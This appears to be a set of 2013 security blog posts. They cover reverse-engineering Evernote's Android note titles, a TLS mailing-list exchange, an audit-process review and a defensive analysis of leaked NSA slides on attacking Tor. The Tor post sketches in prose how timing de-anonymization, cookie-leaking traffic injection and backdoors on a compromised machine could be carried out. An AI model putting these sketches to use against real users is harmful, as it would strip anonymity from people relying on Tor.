jad-ed/com/evernote/ui/QuickSaveFragment.java:        this.bm = b(2131165339);

$ grep -R untitled_note *
Binary file com.evernote-1.apk matches
jad-ed/com/evernote/android/multishotcamera/R$string.java:  public static int untitled_note = 2131165339;
Binary file unzipped/classes.dex matches
Binary file unzipped/resources.arsc matches

Frankly, I'm still not sure why this was tracked down to the exact human-readable resource string - but generally speaking, our goal in Reverse Engineering is to stay as broad as we can until we have to go deep. I traced down more of these constants, inlined them, and followed the trail.

//These statements were not in this order, just placing them together for brevity
localObject2 = paramContext.getString("auto_title_from_meeting_at_location", new Object[] { localObject2, str1, str2 });
localObject2 = paramContext.getString("untitled_note");
localObject2 = paramContext.getString("auto_title_from_meeting", new Object[] { localObject2, str1 });
localObject2 = paramContext.getString("auto_title_at_location", new Object[] { localObject2, str2 });

//Clearly str1 refers to the meeting name, and str2 the location
//Where do they come from?

str1 = b();
str2 = c();

private String b() //get meeting
{
    if ((this.m != null) && (this.m.length > 0))
        return this.m[0];
    return null;
}
private String c() //get location
{
    StringBuilder localStringBuilder = new StringBuilder("");
    if (this.a != null) //this.a is "public Address a;"
    {
        String str1 = this.a.getLocality();
        boolean bool = TextUtils.isEmpty(str1);
        int i1 = 0;
        if (!bool)
        {
            localStringBuilder.append(str1);
            i1 = 1;
        }
        String str2 = this.a.getAdminArea();
        if ((!TextUtils.isEmpty(str2)) && (!str2.equalsIgnoreCase(str1)))
        {
            if (i1 != 0)
                localStringBuilder.append(", ");
            localStringBuilder.append(str2);
        }
    }
    return localStringBuilder.toString().trim();
}

//Let's trace down this.m
public final void b(Bundle paramBundle)
{
    this.a = ((Address)paramBundle.getParcelable(q));
    this.m = paramBundle.getStringArray(p);
}

So we've figured out where the location-based part comes from. It's using a Geolocation API to grab that. Hunting down where the Meeting name came from is going to be much more difficult.

In fact, this is where I spent the bulk of my time. I did greps like grep -R ".b(" ../../, and when that was too coarse, grep -R "b(" ../../../../ | grep ";" | grep -v "," but I wasn't finding much. I decided to import it into Eclipse. Now clearly, this wasn't going to help me build it.

But I was hoping Eclipse would be able to build enough of it, and provide enough code navigation features to get a couple of hints out of it. And indeed, when I references all public calls of "b(Bundle paramBundle)", I did wind up with one:

Now at this point, I wasn't really getting much out of it. I read a lot of this code, and tried to figure out where things were going. I deciphered a lot more of the surrounding code, running down getString() calls and such. Like I said before - we stay broad until we have to go deep. I alternated between going deep, trying to outline what individual functions did while periodically stepping back and skimming the 2-3 surrounding classes.

Eventually, I was confused enough to take a step back. You see, I'm working with decompiled Java code - this is not what the original developers wrote. It's what a tool has translated from bytecode back into Java. It's a bit spaghetti-like, it's a bit wrong. In fact, one function was actually marked as it could not be decompiled:

// ERROR //
  private static String[] b(Context paramContext, String paramString)
  {
    // Byte code:
    //   0: aconst_null
    //   1: astore_2
    //   2: aload_0

So with the experience that only comes from having done this before and understanding the limitations of one's tools, I stepped back even further. I needed to redo this decompilation. Fortunately, there are other Java decompilers out there. And using a second, I was able to get a successful decompilation of this previously undecompilable-b() function.

    private static String[] b(Context context, String s1)
    {
        Cursor cursor;
        ContentResolver contentresolver;
        cursor = null;
        contentresolver = context.getContentResolver();
        Cursor cursor2 = contentresolver.query(Uri.parse("content://com.android.calendar/calendars"), new String[] {
            "_id"
        }, s1, null, null);
        Cursor cursor1 = cursor2;
        if(cursor1 == null) goto _L2; else goto _L1
_L1:
        String as[] = new String[cursor1.getCount()];
        int i1 = 0;
_L5:
        if(!cursor1.moveToNext()) goto _L4; else goto _L3
_L3:
        as[i1] = cursor1.getString(0);
        i1++;
          goto _L5
_L2:
        if(cursor1 != null)
            cursor1.close();
        as = null;
_L7:
        return as;

This seems obvious in retrospect, but it's only by comparing the decompilations in detail that I saw just how wrong the first one was. Seemingly useless and unreachable code suddenly transformed into meaningful control flow statements. (Protip: compilers almost never emit unreachable code.) The calendar event clearly comes from the calendar, locally, on note creation.

Okay, let's step back again. I suspected Evernote might be doing something really cruddy like sending all my calendar events to their server so they can server these note titles. I'm fairly certain that is not the case. I have not reversed Evernote in its entirety and I am not saying they are not doing something very shady. They may well be. But for this single feature I looked at, I don't think they are.².

But ultimately, I come back to the question I posed in the beginning: "If you can provide an awesome feature, and do it in a privacy preserving way, as opposed to a 'do the computation on our servers' approach, why not do that?" and I'll add, why not advertise that. In the age of legal liability for privacy violations and consumer interest in privacy, which is now even more compounded from Snowden - why not differentiate and advertise on technical constraints for privacy, in addition to making a sleek and awesome app and service? Tell people "Hey, we don't just take your privacy 'seriously' like everyone else, we provide our features on your phone so we never see the data."

Another great example of a complete start-up idea: geolocation based notes. I would love, and pay, for an App that let me put down groceries on a shopping list, and it'd remind me when I go in the grocery store. Let me put a marker "When I drive by this point in the road, at this time of day, remind me to pull over and put the clothes I've been trying to donate for a month in the donation bin."³ But all the apps I'm aware of that do this either don't work well, or send all your data (including location) to the server. This could run on the phone, there's no reason why it couldn't. I'll do your monetization strategy one better - sell me little bluetooth or NFC thingies I put at my front door, car, wallet, whatever. Let me make a note like "If I leave the house, remind me to grab the bills I need to mail" or "If I get in the car, and I don't have my wallet, freak out." Or go turn Paul Wouters's privacy preserving Google Latitude-like location-sharing into an app. There's a lot of ideas here.

I'll talk about one more example. RedPhone is an app that lets you make encrypted phone calls to people who also have RedPhone. But because it's annoying to have to manually choose to use RedPhone, plus the problem of knowing which of contacts have RedPhone to begin with - RedPhone will prompt you to upgrade your call to an encrypted call if the person you're calling also uses RedPhone. How does it know the other person uses RedPhone? Well, it could A) send all your contacts to the server and tell you which people have RedPhone⁴ B) send all the people who have RedPhone to you, or C) do something way sexier. What it does is send down a bloom filter that allows you to ask if any individual number has RedPhone, but doesn't give you the entire list of RedPhone users, nor send your contacts to the server.⁵

That's what I'd like to see more of. I'd like to see novel apps selling an innovative product that people want, not necessarily selling privacy - but still developed in a privacy-preserving way. I believe it can be done - call me naive but I believe you can build an awesome, innovative app that fills a niche and is privacy preserving - not privacy preserving as it's selling point with half-baked features added elsewhere⁶.

And also, to close up with Evernote, I think it'd be awesome if Evernote came out and confirmed that their Smart Title Feature, and their app in general, does not send all your contacts, calendar events, or anything up to their servers except the notes you create.

I recognize there are constraints to doing what I describe: battery life, computation speed, backgrounding, etc etc. I view these in the same vein as other engineering problems - they can be overcome with ingenuity, challenging assumptions, testing, and hard work.

¹ Flame me again for using google, but DuckDuckgo's search results just aren't as good on this query.
² I can't stress this enough. I don't know if Evernote is doing something scummy that I didn't uncover in the literally-one-hour I spent on this. Their privacy policy says things like "we automatically gather non-personally identifiable information that indicates your association with one of our business partners", "Any Content you add to your account", and "The geographic area where you use your computer and mobile devices (as indicated by an IP address or similar identifier)". However, it doesn't say "We take all your data."
³ I've had a bag in my car for over a month. Sell me this app, please.
⁴ I think, but am not sure, this is what SnapChat does.
⁵ I'm aware this design isn't perfect, but it's pretty good given the objectives and constraints.
⁶ While apps like Silent Circle and Wickr are coming close, I think apps should remember to build an awesome useable product first, and make the privacy preserving part supplemental as opposed to the primary selling point.

Update: I got a response back from Evernote!

Shortly after posting this article, I got an email from a nice guy named Grant at Evernote, who gave me permission to post:

Hi Tom,

I read your blog post about privacy preserving applications and Evernote. I can confirm that the Smart Title feature, and the app in general, does not send all your contacts, calendar events, or anything else to Evernote servers except for the content of the notes you create.

You might find Evernote’s Three Laws of Data Protection interesting–specifically the second law: http://blog.evernote.com/blog/2011/03/24/evernotes-three-laws-of-data-protection/

Having an employee (Grant works as an Engineer, not in 'Public Relations') reach out to a random blog author is, in my opinion, a good sign of a straightforward and honest company. And I quite like the second law.

Everything you put into Evernote is private by default. We never look at it, analyze it, share it, use it to target ads, data mine it, etc.–unless you specifically ask us to do one of these things. Our business model does not depend on "monetizing" your data in any way. Rather, it depends on building trust and providing a great service that more and more people choose to pay for.

So props to Evernote. :)

Funniest Exchange Ever on TLs Mailing List

06 Nov 2013 16:33:23 EST

Background: there's this huge problem where TLS ClientHellos that exceed 255 bytes result in hangs for certain hardware (like some F5 hardware). Hangs are horrible because the only thing you can do is have a timeout and reconnect – super slow. So we're trying to add extensions (like ALPN for SPDY) and new ciphersuites, all while keeping the size under 255 bytes. Someone asks "Hey how come this happens at all." Someone from F5 responds...

Players:

Xiaoyong Wu - from F5
Adam Langley - who's in charge of pretty much everything SSL at Google (Chrome and Webservers)
Yoav Nir - longtime TLS mailing list contributor and engineer
Stephen Henson - maintainer of OpenSSL

Xiaoyong Wu X.Wu@f5.com via ietf.org 
  
It is a little bit more calculation than that and related to some historic reasons, aka SSLv2.

For SSL records, the SSLv3 and TLS ClientHello headers are as follows:

| 22 | version major | version minor | length high bits | length low bits |

If this is interpreted as an SSLv2 header, it will be considered as a 3 byte header:
| v2 header b0 | v2 header b1 | v2 header b2 | message type |

The value for Client Hello message type is SSLV2_MT_CLIENTHELLO which is 1.
When there is an SSLv3/TLS client-hello of length 256 - 511 bytes, this is ambiguous as "message 
type" is 1 or it is the "length high bits" to be 1.

Our implementation before the patch was to prefer SSLv2 and thus the issue.

As I am explaining this in detail, I would say that another work around on this would be making a 
client hello that exceeds 512 in length.

Adam Langley via ietf.org 
  
On Wed, Nov 6, 2013 at 1:00 PM, Xiaoyong Wu  wrote:
> As I am explaining this in detail, I would say that another work around on this would be making a 
> client hello that exceeds 512 in length.

^^^ Holy crap. I wish I had known that sooner. That might solve the issue.

Cheers

AGL

Yoav Nir via ietf.org 
    
On Nov 6, 2013, at 10:03 AM, Adam Langley  wrote:
> On Wed, Nov 6, 2013 at 1:00 PM, Xiaoyong Wu  wrote:
>> As I am explaining this in detail, I would say that another work around on this would be making a 
>> client hello that exceeds 512 in length.
>
> ^^^ Holy crap. I wish I had known that sooner. That might solve the issue.

Time to standardize the "jpeg-of-cat" extension for TLS.

Dr Stephen Henson lists@drh-consultancy.co.uk via ietf.org 

On 06/11/2013 18:03, Adam Langley wrote:
> On Wed, Nov 6, 2013 at 1:00 PM, Xiaoyong Wu  wrote:
>> As I am explaining this in detail, I would say that another work around on this would be making a 
>> client hello that exceeds 512 in length.
>
> ^^^ Holy crap. I wish I had known that sooner. That might solve the issue.

Just did a quick test with OpenSSL on a couple of known "hang" machines. Seems
to work.

Steve.

The thread is here. Obviously it'll take a lot of testing to figure out if this works reliably, but I think a lot of people are cautiously excited.

Open Technology Fund Audit Report

21 Oct 2013 12:37:23 EST

Over the past year, iSEC Partners has worked with the Open Technology Fund on several of their supported projects, and I've been extremely fortunate to have a finger, arm, or whole body in each of the audits. Most of them were as an Account Manager (just helping arrange the audit between the project and some of our extremely talented consultants) but I also got to roll up my sleeves and pick on a couple myself.

If you haven't heard of OTF, they fund projects that develop open and accessible technologies promoting human rights and open societies. Some of the projects they support that we've been able to work on are Open Whisper Systems' RedPhone and TextSecure, Commotion, and GlobaLeaks, among others.

I also got to work on a followup of the Liberation Technology Auditing Guidelines I authored in the beginning of the year. In conjunction with the audits iSEC performed, I also helped OTF perform a review of their audit process. The goal of this review was to take a look at the breadth, scope, and coverage of security audits performed on OTF funded applications to date. I aimed to identify the strengths and shortcomings in OTF's current process and provide recommendations to improve the breadth of coverage and to derive greater value in the future. The report is (hopefully) applicable to both OTF and other funding agencies in the Liberation Technology and Civil Society communities, and I and iSEC hopes this work inspires more development and more integration between security professionals and project teams. OTF has published this review over on their website where you can take a look.

About the Tor/NSA Slide Decks

7 Oct 2013 09:02:23 EST

Unless you've been living under a rock for the past weekend, you heard about several documents publish by The Guardian and The Washington Post that are (likely) from the NSA explaining how they deal with Tor. I wanted to take a look and analyze them from a technical standpoint.

The good news from these documents is that Tor is doing pretty good. There's a host of quotes that confirm what we hoped: that while there are a lot of techniques the NSA uses to attack Tor, they don't have a complete break. Quotes like "We will never be able to de-anonymize all Tor users all the time" and that they have had "no success de-anonymizing a user in response to a request/on-demand". [0] We shouldn't take these as gospel, but they're a good indicator.

Now something else to underscore in the documents that were released, and in the DNI statement, is that bad people use Tor too. Tor is a technology, no different from Google Earth or guns - it can be used for good or bad. It's not surprising or disappointing to me that the NSA and GCHQ are analyzing Tor.

But from a threat modeling perspective - there's no difference between the NSA/GHCQ, and China or Iran. They're both well-funded adversaries who can operate over the entire Internet and have co-opted national ISPs and inter-network links to monitor traffic. But from my perspective, the NSA is pretty smart, and they have resources unmatched. If they want to target someone, they're going to be able to do so, it's only a matter of putting effort into it. It's impossible to completely secure an entire ecosystem against them. But you can harden it. The documents we've seen say that they have operating concerns[1], and Schneier says the following:

The most valuable exploits are saved for the most important targets. Low-value exploits are run against technically sophisticated targets where the chance of detection is high. TAO maintains a library of exploits, each based on a different vulnerability in a system. Different exploits are authorized against different targets, depending on the value of the target, the target's technical sophistication, the value of the exploit, and other considerations.[4]

What this means to me is that by hardening Tor, we're ensuring that the attacks the NSA does run against it (which no one would be able to stop completely) will only be run against the highest value targets - real bad guys. The more difficult it is to attack, the higher the value of a successful exploit the NSA develops - that means the exploit is conserved until there is a worthwhile enough target. The NSA still goes after bad guys, while all state-funded intelligence agencies have a significantly harder time de-anonymizing or mass-attacking Tor users. That's speculation of course, but I think it makes sense.

That all said - let's talk about some technical details.

Fingerprinting

The NSA says they're interested in fingerprinting Tor users from non-Tor users[1]. They describe techniques that fingerprint the Exit Node -> Webserver connection, and techniques on the User -> Entry Node connection.

They mention that Tor Browser Bundle's buildID is 0, which does not match Firefox's. The buildID is a javascript property - to fingerprint with it, you need to send javascript to the client from them to execute. (TBB's behavior was recently changed, for those trying it at home.) But the NSA sitting on a website wondering if a visitor is from Tor doesn't make any sense. All Tor exit nodes are public. In most cases (unless you chain Tor to a VPN) - the exit IP will be an exit node, and you can fingerprint on that. Changing TBB's buildID to match Firefox may eliminate that one, single fingerprint - but in the majority of cases you don't need that.

What about the other direction - watching a user and seeing if they're connecting to Tor. Well, most of the time, users connect to publicly known Tor nodes. A few percentage of the time, they'll connect to unknown Tor bridges. Those bridges will then connect to known Tor nodes, and the bridges are distinguishable from a user/Tor client because they accept connections. So while a Globally Passive Adversary could enumerate all bridges, the NSA is mostly-but-not-entirely-global. They can enumerate all bridges within their sphere of monitoring, but if they're monitoring a single target outside their sphere, that target may connect to Tor without them being sure it's Tor.

Well, without being sure it's Tor based solely on the source and destination IPs. There are several tricks they note in [2] that let them distinguish the traffic using Deep Packet Inspection. Those include a fixed TLS certificate lifetime, the Issuer and Subject names in the TLS certificate, and the DH modulus. I believe, but am not sure, that some of these have been changed recently in Tor, or are in the process of being redesigned - I need to follow up on that.

Another thing the documents go into length about is "staining" a target so they are distinguishable from all other individuals[3]. This "involves writing a unique marker (or stain) onto a target machine". The most obvious technique would be putting a unique string in the target's browser's User Agent. The string would be visible in HTTP traffic - which matches the description that the stain is visible in "passive capture logs".

However, the User agent has a somewhat high risk of detection. While it's not that common for someone to look at their own User Agent using any of the many free tools out there - I wouldn't consider unusual. Especially if you were concerned with how trackable you were. Also, not to read too closely into a single sentence, but the documents do say that the "stain is visible in passively collected SIGINT and is stamped into every packet". "Every packet" - not just HTTP traffic.

If you wanted to be especially tricky, you could put a marker into something much more subtle - like TCP sequence numbers, IP flags, or IP identification fields. Someone had proffered the idea that a particularly subtle backdoor would be replacing the system-wide Random Number Generator for Windows to DUAL_EC_DRBG using a registry hack.

Something else to note is that the NSA is aware of Obfs Proxy, Tor's obfuscated protocol to avoid nation-state DPI blocking; and also the tool Psiphon. Tor and Psiphon both try to hide as other protocols (SSL and SSH respectively.) According to the leaked documents, they use a seed and verifier protocol that the NSA has analyzed[2]. I'm not terribly familiar with the technical details there, so the notes in the documents may make more sense after I've looked at those implementations.

Agencies Run Nodes

Yup, Intelligence Agencies do run nodes. It's been long suspected, and Tor is explicitly architected to defend against malicious nodes - so this isn't a doomsday breakthrough. Furthermore, the documents even state that they didn't make many operational gains by running them. According to Runa, the NSA never ran exit nodes.

What I said in my @_defcon_ talk is still true: the NSA never ran Tor relays from their own networks, they used Amazon Web Services instead.
— Runa A. Sandvik (@runasand) October 4, 2013

The Tor relays that the NSA ran between 2007 and 2013 were NEVER exit relays (flags given to these relays were fast, running, and valid).
— Runa A. Sandvik (@runasand) October 4, 2013

Correction of https://t.co/U5v7krwZH0: the NSA #Tor relays were only running between 2012-02-22 and 2012-02-28.
— Runa A. Sandvik (@runasand) October 4, 2013

Something I'm going to hit upon in the conclusion is how we shouldn't assume that these documents represent everything the NSA is doing. As pointed out by my partner in a conversation on this - it would be entirely possible for them to slowly run more and more nodes until they were running a sizable percentage of the Tor network. Even though I'm a strident supporter of anonymous and pseudonymous contributions, it's still a worthwhile exercise to measure what percentage of exit, guard, and path probabilities can be attributed to node operators who are known to the community. Nodes like NoiseTor's, or torservers.net are easy, but also nodes whose operators have a public name tied into the web of trust. If we assume the NSA would want to stay as anonymous and deniable as possible in an endeavor to become more than a negligible percentage of the network - tracking those percentages could at least alert us to a shrinking percentage of nodes being run by people 'unlikely-to-be-intelligence-agencies'.

This is especially true because in [0 slide 21] they put forward several experiments they're interested in performing on the nodes that they do run:

Deploying code to aid with circuit reconstruction
Packet Timing attacks
Shaping traffic flows
deny-degrade/disrupt comms to certain sites

Operational Security

Something the documents hit upon is what they term EPICFAIL - mistakes made by users that 'de-anonymize' them. It's certainly the case that some of the things they mention lead to actionable de-anonymization. Specifically, they mention some cookies persisting between Tor and non-Tor sessions (like Doubleclick, the ubiquitous ad cookie) and using unique identifiers, such as email and web forum names.

If your goal is to use Tor anonymously, those practices are quite poor. But something they probably need to be reminded of is that not everyone uses Tor to be anonymous. Lots of people log into their email accounts and Facebook over Tor - they're not trying to be anonymous. They're trying to prevent snooping and secure their web browsing from corporate proxies, their ISP, national monitoring systems, bypass censorship, or disguise their point of origin.

So - poor OpSec leads to a loss of anonymity. But if you laughed at me because you saw me log into my email account over Tor - you missed the point.

Hidden Services

According to the documents, the NSA had made no significant effort to attack Hidden Services. However, their goals were to distinguish Hidden Services from normal Tor clients and harvest .onion addresses. I have a feeling the latter is going to be considerably easier when you can grep every single packet capture looking for .onion's.

But even though the NSA hadn't focused much on Hidden Services by the time the slides had been made doesn't mean others haven't been. Weinmann, et al. authored an explosive paper this year on Hidden Services, where they are able to enumerate all Hidden Service addresses, measure the popularity of a Hidden Service, and in some cases, de-anonymize the a HS. There isn't a much bigger break against HS than these results - if the NSA hadn't thought of this before Ralf, I bet they kicked themselves when the paper came out.

And what's more - the FBI had two high profile takedowns of Hidden Services - Freedom Hosting and Silk Road. While Silk Road appears to be a result of detective work finding the operator, and then following him to the server, I've not seen an explanation for how the FBI located or exploited Freedom Hosting.

Overall - Hidden Services need a lot of love. They need redesigning, reimplementing, and redeploying. If you're relying on Hidden Services for strong anonymity, that's not the best choice. But whether you are or not - if you're doing something illegal and high-profile enough, you can expect law enforcement to be following up sooner or later.

Timing De-Anonymization

This is another truly clever attack. The technique relies on "[sending] packets back to the client that are detectable by passive accesses to find client IPs for Tor users" using a "Timing Pattern" [0 slide 13]. This doesn't seem like that difficult of an attack - the only wrinkle is that Tor splits and chunks packets into 512-byte cells on the wire.

If you're in control of the webserver the user s contacting (or between the webserver and the exit node) - the way that I'd implement this is by changing the IP packet timing to be extremely uncommon. Imagine sending one 400-byte packet, waiting 5 seconds, sending two 400-byte packets, waiting 5 seconds, sending three 400-byte packets, and so on. What this will look like for the user is receiving one 512-byte Tor cell, then a few seconds later, two 512 byte Tor cell, and so on. While the website load may seem slow - it'd be almost impossible to see this attack in action unless you were performing packet captures and looking for irregular timing. (Another technique might ignore/override the TCP Congestion Window, or something else - there's several ways you could implement this.)

Two other things worth noting about this is that the slides say "GCHQ has research paper and demonstrated capability in the lab". It's possible this attack has graduated out of the lab and is now being run live - this would be concerning because this is potentially an attack that could perform mass de-anonymization on Tor users. It's also extremely difficult to counter. The simplest countermeasures (adding random delays, cover traffic, and padding) can generally be defeated with repeated observations. That said - repeated observations are not always possible in the real world. I think a worthwhile research paper would be to implement some or all of these features, perform the attack, and measure what type of security margins you can gain.

There is also the question "Can we expand to other owned nodes?" These 'owned nodes' may be webservers they've compromised, Tor nodes they control, Quantum servers - it's not clear.

End-to-End Traffic Confirmation

Of all our academic papers and threat modeling - this is the one we may have feared the most. The NSA is probably the closest thing to a Global Passive Adversary we have - they're able to monitor large amounts of the Internet infrastructure, log it, and review it. In an End-to-End Traffic confirmation attack, they lay out the plan of attack in [0 slide 6]: "look for connections to Tor, from the target's suspected country, near time of target's activity". They're performing it in the reverse of how I generally think of it: instead of trying to figure out what this particular user is doing - they see activity on a website, and try and figure out which user is performing it

There's no indication of the specifics of how they perform the query: they say they look for "connections to Tor", but does that mean single-hop directory downloads, circuit creation, initial conversation, or something else? Do they take into account packet timings? Traffic size? All of these things could help refine the attack.

According to the slides, GCHQ has a working version dubbed QUICKANT. The NSA has a version as well that "produced no obvious candidate selectors". The NSA goals were to figure out if QUICKANT was working for GCHQ, and continue testing the NSA's version using profiles of "consistent, random and heavy user" - if we assume they don't like the Oxford comma, that's three profiles of a regular, consistent connection to a server, a random connection, and a heavy Tor users.

How do you frustrate End-to-End Confirmation attacks? Well, the bad news is in a Low Latency Onion Routing network - you don't. Ultimately it's going to be a losing proposition, so most of the time you don't try, and instead focus on other tasks. Just like "Timing De-Anonymization" above (which itself is a form of End-To-End Confirmation), it'd be worth investigating random padding, random delays, and cover traffic to see how much a security margin you can buy.

Cookie De-Anonymization

This is a neat trick I hadn't thought of. They apparently have servers around the Internet that are dubbed "Quantum" servers that perform attacks at critical routing points. One of the things they do with these servers it to perform Man-in-the-Middle attacks on connections. The slides[0] describe an attack dubbed QUANTUMCOOKIE that will detect a request to a specific website, and respond with a redirection to Hotmail or Yahoo or a similar site. The client receives the redirect and will respond with any browser cookies they have for Hotmail or Yahoo. (Slides end, Speculation begins:) The NSA would then hop over to their PRISM interface for Hotmail or Yahoo, query the unique cookie identifier and try and run down the lead.

Now the thing that surprises me the most about this attack is not how clever it is (it's pretty clever though) - it's how risky it is. Let's imagine how it would be implemented. Because they're trying to de-anonymize a user, and because they're hijacking a connection to a specific resource - they don't know what user they're targeting. They just want to de-anonymize anyone who accesses, say, example.com. So already, they're sending this redirection to indiscriminate users who might detect it. Next off - the slides say "We detect the GET request and respond with a redirect to Hotmail and Yahoo!". You can't send a 300-level redirect to two sites, but if I was implementing the attack, I'd want to go for the lowest detection probability. The way I'd implement that is by doing a true Man-in-the-middle and very subtly adding a single element reference to Hotmail, Yahoo, and wherever else. The browser will request that element and send along the cookie. However, two detection points remain: a) if you use a javascript or css element, you risk the target blocking it and being alerted by NoScript and b) if the website uses Content Security Policy, you will need to remove that header also. Both points can be overcome - but the more complicated the attack, the more risky.

Exploitation

Finally - let's talk about the exploits mentioned in the slides.

Initial Clientside Exploitation

Let's first touch on a few obvious points. They mention that their standard exploits don't work against Tor Browser Bundle, and imply this may be because they are Flash-based. [0 slide 16, 1] But as Chrome and other browsers block older Flash versions, and click-to-play becomes more standard, any agency interested in exploitation would need to migrate to 'pure' browser-based exploits, which is what [1] indicates. [1] talks about two pure-Firefox exploits, including one that works on TBB based on FF-10-ESR.

This exploit was apparently a type confusion in E4X that enabled code execution via "the CTypes module" (which may be js-ctypes, but I'm not sure). [1] They mention that they can't distinguish the Operating System, Firefox version, or 32/64 bitness "until [they're] on the box" but that "that's okay" - which seems very strange to me because every attacker I know would just detect all those properties in javascript and send the correct payload. Does the NA have some sort of cross-OS payload that pulls down a correct stager? Seems unlikely, I'll chalk this up to a reading too much into semi-technical bullet points in a PowerPoint deck.

This vulnerability was fixed in FF-ESR-17, but the FBI's recent exploitation of a FF-ESR-17 bug (fixed in a point release most users had not upgraded to) shows that the current version of FF is just as easily exploited. These attacks show the urgency of hardening Firefox and creating a smooth update mechanism. The Tor Project is concerned about automatic updates (as they create a significant amount of liability in that signing key and the possibility of compelled updates) - but I think that could be overcome through multi-signing and distribution of trust and jurisdictions. Automatic updates are critical to deploy

Hardening Firefox is also critical. If anyone writes XML in javascript I don't think I want to visit their website anyway. This isn't an exhaustive list, but some of the things I'd look at for hardening Firefox would be:

Sandboxing - a broad category, but Chrome's sandboxing model makes exploitation significantly more difficult.
The JIT Compiler
All third party dependencies - review what they're used for, what percentage of the imported library is actually used, what it's security history is, and if they can be shrunk, removed, or disabled. Just getting an inventory of these with descriptions and explanations of use will help guide security decisions.
Obscure and little-used features - especially in media and CSS parsing. See if these features can be disabled in Tor Browser Bundle to reduce the attack surface, or blocked until whitelisted by NoScript. The E4X feature is a fantastic example of this. Little-used Web Codecs would be another.
Alternate scheme support - looking at about:config with the filter "network.protocol-handler" it looks like there are active protocol handlers for snews, nntp, news, ms-windows-store (wtf?), and mailto. I think those first four can probably be disabled for 99% of users.

For what it's worth, [2 slide 46] mentions that Tails (the Tor live-DVD distribution) adds severe exploitation annoyances. Tails would prevent an attacker from remaining persistent on the machine.

Random Musings on Operations

There's a strange slide with some internal references in one of the presentations. It took me a couple read-throughs, but then something clicked as a possible explanation. This is speculation, but judge for yourself if you think it makes sense.

Apparently they tested their callback mechanism (the piece of code that will phone home to their server) and while it worked on normal Firefox, it didn't work on Tor Browser Bundle. It "gained execution" but "didn't receive FINKDIFFERENT", and that it was "defeated by prefilter hash".

When running a clientside exploitation test for a client, we'll limit our exploits from being served to random people outside their corporate network, usually using IP address filtering. If you're not in the netblock we expect - you don't get the exploit. For us, this is to avoid hacking anyone who hasn't asked for it - for the NSA it's (probably) to limit the chance of detection, and (hopefully) for legal reasons.

If their generic exploitation engine (which Schneier says is called FOXACID[4]) was built in a similar way, they would load the target's IP address into it, and have a mechanism that blocks exploitation unless the payload was accessed by that IP address. Tor would break that - there's the target IP address (which they may read from the machine), and there's the exit node's IP address which is likely read by the server sending the exploit.

I don't know what EGGI or FIDI are, but that's my interpretation of this slide.

Further Clientside Exploitation

There is also a section on dirty tricks that can be played if you've gained access to the user's machine. [0 slide 17] mentions "given CNE access to a target computer" - I interpret that to mean "given Computer Network Exploitation access" - that is "if we're controlling their box already, but we don't want to do something that may alert the user (like copying all their traffic to our IP), how can we subtly backdoor them". This is pretty far outside Tor's threat model - if you're running an application as the same user or as root/Administrator - that's not much a desktop operating system does to prevent one application (like a rootkit) from manipulating a second application (like Tor). But it's definitely worth examining their ideas:

Alter path selection to use exit nodes they control or monitor closely - this could be done by modifying or replacing the Tor binaries on disk, or while it is running in memory
Slide them onto an entire other Tor network - also possible to do on disk or in memory, all you'd need to do would be replace the hardcoded directory servers and signing keys
Stain their user agent or traffic so they can identify it on the way out (as mentioned above, they say they can do this already)
Have the computer call out and let them know where it is (which is what the FBI did in the Freedom Hosting situation)

Web Server Exploitation

Again, given a presence on the webserver (they control or have exploited it), they talk about sending the traffic out of the webserver in such a way that the Tor traffic going to the client is distinguishable. ([0 slide 18] and the Timing De-Anonymization section above)

Mass Node Exploitation

The fairly popular theory of "I bet the NSA has just exploited all the Tor nodes" seems to be partially debunked in [0 slide 19]. They explain "Probably not. Legal and technical challenges."

Tor Disruption

A popular topic in the slides is disrupting and denying access to Tor. My theory is that if they can make Tor suck for their targets, their targets are likely to give up on using Tor and use a mechanism that's easier to surveil and exploit. [0 slide 20] talks about degrading access to a web server they control if it's accessed through Tor. It also mentions controlling an entire network and deny/degrade/disrupt the Tor experience on it.

Wide scale network disruption is put forward on [0 slide 22]. One specific technique they mention is advertising high bandwidth, but actually perform very slowly. This is a similar trick to one used by [Weinmann13], so the Tor project is both monitoring of wide scale disruption of this type and combatting it through design considerations.

Conclusion

The concluding slide of [0] mentions "Tor Stinks... But It Could be Worse". A "Critical mass of targets do use Tor. Scaring them away may from Tor might be counterproductive".

Tor is technology, and can be used for good or bad - just like everything else. Helping people commit crimes is something no one wants to do, but everyone does - whether it's by just unknowingly giving a fugitive directions or selling someone a gun they use to commit a crime. Tor is a powerful force for good in the world - it helps drive change in repressive regimes, helps law enforcement (no, really), and helps scores of people protect themselves online. It's kind of naive and selfish, but I hope the bad guys are scared away, while we make Tor more secure for everyone else.

Something that's worth noting is that this is a lot of analysis and speculation off some slide decks that have uncertain provenance (I don't think they're lying, but they may not tell the whole truth), uncertain dates of authorship, and may be omitting more sensitively classified information. This a definite peek at a playbook - but it's not necessarily the whole playbook. We should keep that in mind and not base all of our actions off these particular slide decks. But it's a good place to start and a good opportunity to reevaluate our progress.

[0] http://media.encrypted.cc/files/nsa/tor-stinks.pdf
[1] http://media.encrypted.cc/files/nsa/egotisticalgiraffe-wapo.pdf
[1.5] http://media.encrypted.cc/files/nsa/egotisticalgiraffe-guardian.pdf
[2] http://media.encrypted.cc/files/nsa/advanced-os-multi-hop.pdf
[3] http://media.encrypted.cc/files/nsa/mullenize-28redacted-29.pdf
[4] http://www.theguardian.com/world/2013/oct/04/tor-attacks-nsa-users-online-anonymity
[Weinmann13] http://www.ieee-security.org/TC/SP2013/papers/4977a080.pdf

About the Cryptopocalypse

20 Aug 2013 9:11 EST

Randomness, and DSA

Last weekend, Bitcoin reported that several Android-based wallets were insecure and that bitcoin were stolen from them - all because the individual transactions (authenticated by a ECDSA signature) used a poor source of randomness. When you use a poor source of randomness in a DSA (or ECDSA) signature, you may reuse one of the values in the signature, the k value. Reusing k can expose the private key - something Sony knows well, as it was the flaw that exposed a private key in the PS3.

But the Bitcoin apps used SecureRandom, which as the name implies is actually supposed to be cryptographically secure. On Android, it's the recommended, "cryptographically secure" library... and it wasn't secure. And the results have been as catastrophic as they can be - long term private keys have been recovered. Why? Mathematically speaking, we understand why - but why do we rely on DSA, when it has this horrendous property? We know that random number generators will fail. Whether it's this instance, Mining Your P's and Q's, or Debian's openssl bug - even in seemingly highly secure or reliable instances... we still shouldn't trust the random number generator fully. While every algorithm requires strong randomness for key generation, only DSA requires strong randomness for every signature - RSA does not. It's time to stop letting DSA hold a gun to our heads.

